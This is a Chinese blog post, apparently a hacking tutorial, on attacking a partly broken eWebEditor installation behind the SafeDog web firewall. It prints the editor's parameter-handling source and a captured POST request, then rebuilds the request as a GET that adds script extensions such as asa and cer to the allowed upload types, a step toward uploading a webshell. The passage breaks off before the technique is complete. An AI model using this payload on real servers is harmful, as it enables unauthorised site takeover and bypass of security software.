当前位置:首页 >> 网络通讯 >> 网络安全 >> 内容

问题ewebeditor编辑器突破安全狗

时间:2013/4/19 12:09:00 作者:平凡之路 来源:xuhantao.com 浏览:

题目说到了问题和突破,问题的ewebeditor程序,这儿程序问题出来哪儿呢?
      
 1.登陆的地方被删除了,也就是admin_login.asp这个页面被删除了。
        2.是post提交好像有问题,不管点击那个提交post都会跳转到登陆页面,但是登陆页面又没有,如果直接访问那个页面,当然也可以访问。
   
当然上边说到的突破,所谓突破也就是说非常规的环境,非常规的手法去实现同一个目的。下面说一下这个非常规的环境。
     
  1.问题ewebeditor
        2.服务器装有安全狗
   
下面是我测试的过程:
        首先当然是增加样式,但是常规的post提交失败,于是我想到了想这样的在老程序他一般都是使用request接受数据的,于是乎我下载了源码看了下,如果如此:
01    ' 检测样式表单提交的有效性
02 sStyleName = Trim(Request("d_name"))
03 sStyleDir = Trim(Request("d_dir"))
04 sStyleCSS = Trim(Request("d_css"))
05 sStyleUploadDir = Trim(Request("d_uploaddir"))
06 sStyleBaseHref = Trim(Request("d_basehref"))
07 sStyleContentPath = Trim(Request("d_contentpath"))
08 sStyleWidth = Trim(Request("d_width"))
09 sStyleHeight = Trim(Request("d_height"))
10 sStyleMemo = Request("d_memo")
11 sStyleImageExt = Request("d_imageext")
12 sStyleFlashExt = Request("d_flashext")
13 sStyleMediaExt = Request("d_mediaext")
14 sStyleRemoteExt = Request("d_remoteext")
15 sStyleFileExt = Request("d_fileext")
16 sStyleImageSize = Request("d_imagesize")
17 sStyleFlashSize = Request("d_flashsize")
18 sStyleMediaSize = Request("d_mediasize")
19 sStyleRemoteSize = Request("d_remotesize")
20 sStyleFileSize = Request("d_filesize")
21 sStyleStateFlag = Request("d_stateflag")
22 sStyleAutoRemote = Request("d_autoremote")
23 sStyleShowBorder = Request("d_showborder")
24 sStyleUploadObject = Request("d_uploadobject")
25 sStyleAutoDir = Request("d_autodir")
26 sStyleDetectFromWord = Request("d_detectfromword")
27 sStyleInitMode = Request("d_initmode")
28 sStyleBaseUrl = Request("d_baseurl")
   
他的数据接受都是request,也就是说他会接受post和get和cookie提交上去的数据。
  
 当然此处post失效了,所以我抓了下包,得到如下数据
01  /system/eWebEditor/admin_style.asp?action=StyleSetSave&id=50

02 
03 POST /system/eWebEditor/admin_style.asp?action=StyleSetSave&id=50 HTTP/1.1
04 Host: xxxx.com
05 User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:12.0) Gecko/20100101 Firefox/12.0
06 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
07 Accept-Language: en-US,en;q=0.5
08 Accept-Encoding: gzip, deflate
09 Connection: keep-alive
10 Referer: /system/eWebEditor/admin_style.asp?action=styleset&id=50

11 Cookie: ASPSESSIONIDSABCQBBT=KHLJMNEAEKNNMGAMJAFHCPOK
12 Content-Type: application/x-www-form-urlencoded
13 Content-Length: 740
14 d_name=standard1&d_initmode=EDIT&d_uploadobject=0&d_autodir=0&d_dir=standard&d_css=office&d_width=550&d_height=350&d_stateflag=1&d_detectfromword=true&d_autoremote=1&d_showborder=0&d_baseurl=1&d_uploaddir=UploadFile%2F&d_basehref=&d_contentpath=&d_imageext=gif%7Cjpg%7Cjpeg%7Cbmp%7C%3Basa.ass%3B.jpg&d_imagesize=500&d_flashext=swf&d_flashsize=100&d_mediaext=rm%7Cmp3%7Cwav%7Cmid%7Cmidi%7Cra%7Cavi%7Cmpg%7Cmpeg%7Casf%7Casx%7Cwma%7Cmov&d_mediasize=100&d_fileext=rar%7Czip%7Cexe%7Cdoc%7Cxls%7Cchm%7Chlp&d_filesize=500&d_remoteext=gif%7Cjpg%7Cjpeg%7Cbmp&d_remotesize=100&d_memo=Office%B1%EA%D7%BC%B7%E7%B8%F1%A3%AC%B2%BF%B7%D6%B3%A3%D3%C3%B0%B4%C5%A5%A3%AC%B1%EA%D7%BC%CA%CA%BA%CF%BD%E7%C3%E6%BF%ED%B6%C8%A3%AC%C4%AC%C8%CF%D1%F9%CA%BD&x=42&y=11
    于是使用构造get提交方式:
 
 ?action=StyleSetSave&id=50&d_name=standard1&d_initmode=EDIT&d_uploadobject=0&d_autodir=0&d_dir=standard&d_css=office&d_width=550&d_height=350&d_stateflag=1&d_detectfromword=true&d_autoremote=1&d_showborder=0&d_baseurl=1&d_uploaddir=%2F&d_basehref=&d_contentpath=&d_imageext=gif%7Cjpg%7Cjpeg%7Cbmp%7Casaspp%7Ccer%7cASA&d_imagesize=500&d_flashext=swf&d_flashsize=100&d_mediaext=rm%7Cmp3%7Cwav%7Cmid%7Cmidi%7Cra%7Cavi%7Cmpg%7Cmpeg%7Casf%7Casx%7Cwma%7Cmov&d_mediasize=100&d_fileext=rar%7Czip%7Cexe%7Cdoc%7Cxls%7Cchm%7Chlp&d_filesize=500&d_remoteext=gif%7Cjpg%7Cjpeg%7Cbmp&d_remotesize=100&d_memo=Office%B1%EA%D7%BC%B7%E7%B8%F1%A3%AC%B2%BF%B7%D6%B3%A3%D3%C3%B0%B4%C5%A5%A3%AC%B1%EA%D7%BC%CA%CA%BA%CF%BD%E7%C3%E6%BF%ED%B6%C8%A3%AC%C4%AC%C8%CF%D1%F9%CA%BD&x=42&y=11
  
 然后直接访问时,他显示是提交成功了,实际上也米有成功,www.xuhantao.com,需要我们先访问:

相关文章
  • 没有相关文章
  • 徐汉涛(www.xuhantao.com) © 2024 版权所有 All Rights Reserved.
  • 部分内容来自网络,如有侵权请联系站长尽快处理 站长QQ:965898558(广告及站内业务受理) 网站备案号:蒙ICP备15000590号-1